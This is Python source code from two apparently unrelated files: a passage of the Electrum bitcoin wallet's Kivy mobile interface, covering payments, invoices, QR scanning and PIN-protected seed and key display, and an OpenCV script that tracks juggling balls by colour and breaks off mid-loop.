from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
    def on_auto_connect(self, instance, x):
        # Property observer: push the new auto_connect flag into the network
        # layer while keeping the other connection parameters unchanged.
        host, port, protocol, proxy, auto_connect = self.network.get_parameters()
        self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)

    def toggle_auto_connect(self, x):
        # Flip the flag; on_auto_connect() fires through the property binding.
        self.auto_connect = not self.auto_connect
    def choose_server_dialog(self, popup):
        # Show a server-selection dialog; on choice, fill the host/port
        # fields of *popup* using the chosen host's SSL ('s') port.
        from .uix.dialogs.choice_dialog import ChoiceDialog
        protocol = 's'
        def cb2(host):
            from electrum.bitcoin import NetworkConstants
            # fall back to the well-known default ports for unknown hosts
            pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
            port = pp.get(protocol, '')
            popup.ids.host.text = host
            popup.ids.port.text = port
        servers = self.network.get_servers()
        ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
    def choose_blockchain_dialog(self, dt):
        # Offer a chain-selection dialog when more than one blockchain
        # (fork) is currently known to the network layer.
        from .uix.dialogs.choice_dialog import ChoiceDialog
        chains = self.network.get_blockchains()
        def cb(name):
            # follow the chain whose display name was picked
            for index, b in self.network.blockchains.items():
                if name == self.network.get_blockchain_name(b):
                    self.network.follow_chain(index)
            #self.block
        names = [self.network.blockchains[b].get_name() for b in chains]
        if len(names) > 1:
            ChoiceDialog(_('Choose your chain'), names, '', cb).open()
    use_rbf = BooleanProperty(False)

    def on_use_rbf(self, instance, x):
        # Persist the replace-by-fee preference.
        self.electrum_config.set_key('use_rbf', self.use_rbf, True)

    use_change = BooleanProperty(False)

    def on_use_change(self, instance, x):
        # Persist whether change addresses are used.
        self.electrum_config.set_key('use_change', self.use_change, True)

    use_unconfirmed = BooleanProperty(False)

    def on_use_unconfirmed(self, instance, x):
        # Stored inverted: the config key is 'confirmed_only'.
        self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
video.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Import the relevant files
from sys import exit as Die
try:
import sys
import time
import cv2
import time
import imutils
import numpy as np
from threading import Thread
from colordetection import ColorDetector
import os
import pickle
import serial
except ImportError as err:
Die(err)
class WebcamVideoStream:
    """Continuously grab frames from a camera on a background thread.

    ``read()`` always returns the most recently grabbed frame without
    blocking on camera I/O; ``stop()`` asks the grab loop to exit.
    """

    def __init__(self, src=0, name="WebcamVideoStream"):
        # Open the capture device and prime the first frame so read()
        # never returns an unset value.
        self.stream = cv2.VideoCapture(src)
        (self.grabbed, self.frame) = self.stream.read()
        # Thread name, handy when debugging multiple streams.
        self.name = name
        # Shutdown flag polled by the grab loop.
        self.stopped = False

    def start(self):
        """Launch the grab loop on a daemon thread and return self."""
        worker = Thread(target=self.update, name=self.name, args=())
        # Daemon thread: must not keep the interpreter alive on exit.
        worker.daemon = True
        worker.start()
        return self

    def update(self):
        """Grab loop: keep reading frames until stop() is called."""
        while not self.stopped:
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        """Return the latest frame grabbed by the worker thread."""
        return self.frame

    def stop(self):
        """Request the grab loop to terminate."""
        self.stopped = True
'''
Testing variable
set to false to start task 2 & 3
'''
cameratesting = False

'''
Initialize the camera here
'''
# Camera device index passed to cv2.VideoCapture.
cam_port = 0
# Start the threaded frame grabber immediately at import time.
cam = WebcamVideoStream(src=cam_port).start()

# File where pickled HSV calibration bounds are persisted between runs.
calibrationfile = "calibration.txt"
# Maximum number of trajectory points kept per ball colour.
num_data_points = 30
# NOTE(review): appears unused in the visible code — confirm before removing.
time_limit = 30

# Colour tuples for cv2 drawing calls (OpenCV uses BGR channel order).
RED = (0, 0, 200)
BLUE = (200, 0, 0)
GREEN = (0, 200, 0)
def empty_callback(x):
    """No-op trackbar callback.

    OpenCV requires a callback when creating a trackbar; *x* is the new
    slider value. The sliders are instead polled elsewhere with
    cv2.getTrackbarPos, so nothing needs to happen here.
    """
    return None
def scan():
"""
Open up the webcam and scans the 9 regions in the center
and show a preview.
After hitting the space bar to confirm, the block below the
current stickers shows the current state that you have.
This is show every user can see what the computer took as input.
:returns: dictionary
"""
# Read the calibration values from file
if os.path.exists(calibrationfile):
file = open(calibrationfile, "rb")
defaultcal = pickle.load(file)
file.close()
# If no calibration file exists, create it and use the default values
else:
defaultcal = { # default color calibration (based on IDC garage)
'red': [[179, 225, 160], [155, 160, 65]],
'blue': [[105, 255, 180], [95, 200, 40]],
'green': [[88, 192, 146], [30, 69, 73]]
}
file = open(calibrationfile, "wb")
pickle.dump(defaultcal, file)
file.close()
colorcal = {} # color calibration dictionary
color = ['red', 'blue', 'green'] # list of valid colors
line_color = [RED, BLUE, GREEN]
cv2.resizeWindow('default', 1000, 1000)
# create trackbars here
cv2.createTrackbar('H Upper', "tool", defaultcal[color[len(colorcal)]][0][0], 179, empty_callback)
cv2.createTrackbar('H Lower', "tool", defaultcal[color[len(colorcal)]][1][0], 179, empty_callback)
cv2.createTrackbar('S Upper', "tool", defaultcal[color[len(colorcal)]][0][1], 255, empty_callback)
cv2.createTrackbar('S Lower', "tool", defaultcal[color[len(colorcal)]][1][1], 255, empty_callback)
cv2.createTrackbar('V Upper', "tool", defaultcal[color[len(colorcal)]][0][2], 255, empty_callback)
cv2.createTrackbar('V Lower', "tool", defaultcal[color[len(colorcal)]][1][2], 255, empty_callback)
cv2.createTrackbar('Max Ball Size', "tool", 100, 100, empty_callback)
cv2.createTrackbar('Min Ball Size', "tool", 6, 100, empty_callback)
# Remember that the range for S and V are not 0 to 179
# make four more trackbars for ('S Upper', 'S Lower', 'V Upper', 'V Lower')
# Note you should use these trackbar names to make other parts of the code run properly
trajectory = [[] for _ in color]
wait_for_peak = [True for _ in color]
left_throw = False
right_throw = False
screen_width = 600
limit_height = 200
bottom_height = 400
TURN_ON_LEFT = b'1'
TURN_ON_RIGHT = b'2'
# Actuation Variables
checker_time = time.time() # timer for determining actuation (checks drops and throws every 30 secs)
throw_time = 0 # timer for time between throws
drop_time = 0 # timer for time after ball(s) drop
haptics_on = True
msg = ''
msg_frames = 200
msg_frame_count = 0
# There are six levels of actuation:
# - two for each level of juggling (1 ball, 2 balls, 3 balls)
# o one with haptics and one without
while True:
frame = cam.read()
while frame is None:
pass
frame = imutils.resize(frame, width=screen_width) # may not be necessary
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # generates an hsv version of frame and
# stores it in the hsv image variable
key = cv2.waitKey(1) & 0xff
# quit on escape.
if key == 27:
break
# get area constraints
max_size = cv2.getTrackbarPos('Max Ball Size', 'tool')
min_size = cv2.getTrackbarPos('Min Ball Size', 'tool') + 1
for index, name in enumerate(color):
trajectory_color = line_color[index]
# find current ball color
if name == "red":
# gets calibration values
hu, su, vu = defaultcal[name][0]
hl, sl, vl = defaultcal[name][1]
# makes mask
lower_hsv = np.array([0, sl, vl])
upper_hsv = np.array([hl, su, vu])
mask1 = cv2.inRange(hsv, lower_hsv, upper_hsv)
lower_hsv = np.array([hu, sl, vl])
upper_hsv = np.array([179, su, vu])
mask2 = cv2.inRange(hsv, lower_hsv, upper_hsv)
# make a mask with current ball color
mask = cv2.bitwise_or(mask1, mask2)
else:
upper_hsv = np.array(defaultcal[name][0])
lower_hsv = np.array(defaultcal[name][1])
# make a mask with current ball color
mask = cv2.inRange(hsv, lower_hsv, upper_hsv) # makes a mask where pixels with hsv in bounds
# erosions and dilations remove any small blobs left in the mask
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# convert masked image to grayscale, run thresholding and contour detection
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
if len(cnts) > 0:
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
if not (max_size > radius > min_size) or (y > bottom_height):
continue
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# draw some stuff!
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
# adds point to trajectory
if len(trajectory[index]) == num_data_points:
